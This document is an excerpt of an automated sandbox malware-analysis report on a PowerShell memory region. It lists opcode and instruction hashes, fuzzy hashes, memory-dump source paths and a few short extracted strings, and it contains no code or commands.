                  Has exited:true

                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c80db7e144e3ab99e89e1b00b72da15ecaf09fb96e23fcb7820b3bd2f9a9f7bd
                    • Instruction ID: 878399debf1e77f4bf8d5dee6b89783d6e5d7ef671cbe503c78d02e34df8ccb5
                    • Opcode Fuzzy Hash: c80db7e144e3ab99e89e1b00b72da15ecaf09fb96e23fcb7820b3bd2f9a9f7bd
                    • Instruction Fuzzy Hash: E04139F1B08206EFEB12AF28C544B6E77E2EF85240F1880E6D5009F661EB35D990D762
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c6798f48b3afc08b1764851f2c2f193934e97d6bafe2586432e24e276ae8e2f
                    • Instruction ID: 62907f63a71d43f7dbcdc176e8c11c3354333ea3d0c095537017c6b53caf9bc1
                    • Opcode Fuzzy Hash: 8c6798f48b3afc08b1764851f2c2f193934e97d6bafe2586432e24e276ae8e2f
                    • Instruction Fuzzy Hash: 75414AF2B04315ABEB24BB69894036EF7A1EFC5614F5485AAD816EB200FB31DA41C7D1
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 674a7acc4a7d217d027fc94ca9af3df21ad4eeb7dd6aae1a3ed09b14e52cc017
                    • Instruction ID: f972e64d1d14e340d0dd95be346abb00b891b16f653cbf8327a67de45ed2c1b4
                    • Opcode Fuzzy Hash: 674a7acc4a7d217d027fc94ca9af3df21ad4eeb7dd6aae1a3ed09b14e52cc017
                    • Instruction Fuzzy Hash: B14129F2A08207ABEB60AF688540B6E77A2DF85300F14C0F5D9049F295EB36ED95D771
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 311110a781bf1de0f5cafb82c1e517b6f717eed26dd2f5eaa67e1a24c304b732
                    • Instruction ID: 44396b0b988932c30c4e2dcbfb99cfb05e5d0977ebeb007724d87eed33e8aef4
                    • Opcode Fuzzy Hash: 311110a781bf1de0f5cafb82c1e517b6f717eed26dd2f5eaa67e1a24c304b732
                    • Instruction Fuzzy Hash: 1E216EB23083077BF7247ABA4491B3B7286DBC5711F24847AA505EB281ED73C9809361
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb03e24bfd93ed185e554b7fed9171617846cb2a9ed332cd5853519349533e1e
                    • Instruction ID: 53b4e5dabdd9f925ffb1d4a627eca66cb7a6b840bd29868e6d80baf83de13cf6
                    • Opcode Fuzzy Hash: fb03e24bfd93ed185e554b7fed9171617846cb2a9ed332cd5853519349533e1e
                    • Instruction Fuzzy Hash: 0D213EB231834EBBFB78797E5801777B2AADBC1611F3484BAE505C7281DE75C9408361
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0804bebb0350966af62b7150279388c9cdd738996f1b79f20abf746e347ac8b8
                    • Instruction ID: 1f315a92c194d362a5d6fd91773449c51a057d0534cb45e4ef610ced0a25d9b0
                    • Opcode Fuzzy Hash: 0804bebb0350966af62b7150279388c9cdd738996f1b79f20abf746e347ac8b8
                    • Instruction Fuzzy Hash: 6B216BF230C34A7FF7147A6A84917777B959F86700F6880E6E544EB2C2EA76C980D361
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de622e4a706896fbe313642acdad17f154d0b5f773302bf60a1af7a40466430d
                    • Instruction ID: 0773f1008a074b51f15e0885decf41ad82d18c3fbbf7963f8780125d4c731783
                    • Opcode Fuzzy Hash: de622e4a706896fbe313642acdad17f154d0b5f773302bf60a1af7a40466430d
                    • Instruction Fuzzy Hash: 0A2104F230C3CD6FFB752A7E48107667BB5CB82610F2880F6E644CB292D96989448322
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8ef3ecfbf7c256c3e0a88343124c1fb22e182c47c041e8b0a1e4d96efe5b7b25
                    • Instruction ID: e48decf5a8b9a19c25e49080137a51306343593d1c90e3e69e35d0232c3121ef
                    • Opcode Fuzzy Hash: 8ef3ecfbf7c256c3e0a88343124c1fb22e182c47c041e8b0a1e4d96efe5b7b25
                    • Instruction Fuzzy Hash: F121C4F6A08356EFDB25BF69C640369FBB0EF46214F6541DAD854E7201E330D914CBA1
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b011b685b8d79aac165a8daae81de1591723a268bd3e8eb9bc49be9fcaeb4fc
                    • Instruction ID: 782bf3a82483a368c50af6c14bfa2bfae42295f8b5f4737d8fd22097f091c0d5
                    • Opcode Fuzzy Hash: 5b011b685b8d79aac165a8daae81de1591723a268bd3e8eb9bc49be9fcaeb4fc
                    • Instruction Fuzzy Hash: 4F01F7B730821A7BE71479AAA400676BB99DFC5622F14C07FDD9AC7241FA32D845C7A0
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 459583b019833b2cda6d8958613874c924160172e3fc49d10fa545262b1abcdb
                    • Instruction ID: 104a25f15345d98740df8e53751efef483f198d228beb890c90374964a06b30c
                    • Opcode Fuzzy Hash: 459583b019833b2cda6d8958613874c924160172e3fc49d10fa545262b1abcdb
                    • Instruction Fuzzy Hash: 57F039B460D281AFE3629B18D855B20BFB1AB82214B1CC0EBD0548F1A3C367C886CB61
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$(ful$(ful$4rl$4rl$tLgk
                    • API String ID: 0-2005697466
                    • Opcode ID: 1e2f31eeb284a41ef840053098e504ab65f7d51cc085c3a77954e56eb896a66c
                    • Instruction ID: a8ff0269063ad02cf70df95c2978538d413ef8442d572627259b319e9afa1684
                    • Opcode Fuzzy Hash: 1e2f31eeb284a41ef840053098e504ab65f7d51cc085c3a77954e56eb896a66c
                    • Instruction Fuzzy Hash: AD61B1B0B04209EFE714EB68C445B6AB7E3EFC9610F1485A9D41AAB344DB71ED41CB92
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: kl$kl$kl$kl
                    • API String ID: 0-457254638
                    • Opcode ID: 623ccbdf4ce700038fc3e153dd58492174131758b20181a5cecc9c9933ebda71
                    • Instruction ID: 5fe87096b56bbd3b60627043ce646b567faa2829feec176c04977926a481b1c9
                    • Opcode Fuzzy Hash: 623ccbdf4ce700038fc3e153dd58492174131758b20181a5cecc9c9933ebda71
                    • Instruction Fuzzy Hash: B4F14AF2B08306AFEB14AB6DD4007AAB7E5EFC5210F1480BAD545CB251DB31E952D7A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$x.fk$-fk
                    • API String ID: 0-2452553513
                    • Opcode ID: 648240781b55bf2e91d8bee679d589643e208cf871af56659b5a4a041c4ba264
                    • Instruction ID: a93dfe016476d04f85724e71aa6ba6ce3e55da49315675801c3547f8a552ef2d
                    • Opcode Fuzzy Hash: 648240781b55bf2e91d8bee679d589643e208cf871af56659b5a4a041c4ba264
                    • Instruction Fuzzy Hash: 15C1A2B0A04305EBEB24EF64C551BAEB7F2EF88704F1484A9E8056B754DB71ED41CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$(ful$(ful
                    • API String ID: 0-100295639
                    • Opcode ID: bc1b0e6eb38d1f4e194ea07f664c18fed225891dba00fdd3f72241415f9f1399
                    • Instruction ID: 031aa5fee5ed8b5514f5aeed109bc4b9f707478555bb14f07e50e0784f56f1bd
                    • Opcode Fuzzy Hash: bc1b0e6eb38d1f4e194ea07f664c18fed225891dba00fdd3f72241415f9f1399
                    • Instruction Fuzzy Hash: 237162F0A08205EFEB14EF58C550B6EBBB2EF89214F1481A9E805AB351DF32DD51CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.1916492081.0000000007BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7ba0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ful$(ful$4rl$tLgk
                    • API String ID: 0-2221605959
                    • Opcode ID: 1df035498cb93329bdd58ca42cbebd0f4d0b7061c2da983fc751664df2fdea4b
                    • Instruction ID: da36b76eec6a6d193f239e4b09af6508d99b19039208df030c2caa74b0d785a4
                    • Opcode Fuzzy Hash: 1df035498cb93329bdd58ca42cbebd0f4d0b7061c2da983fc751664df2fdea4b
                    • Instruction Fuzzy Hash: 5651D4B4A04205EFEB14EF58C445AAAB7F3EF89314F1485AAE415AB350DB32DD41CB51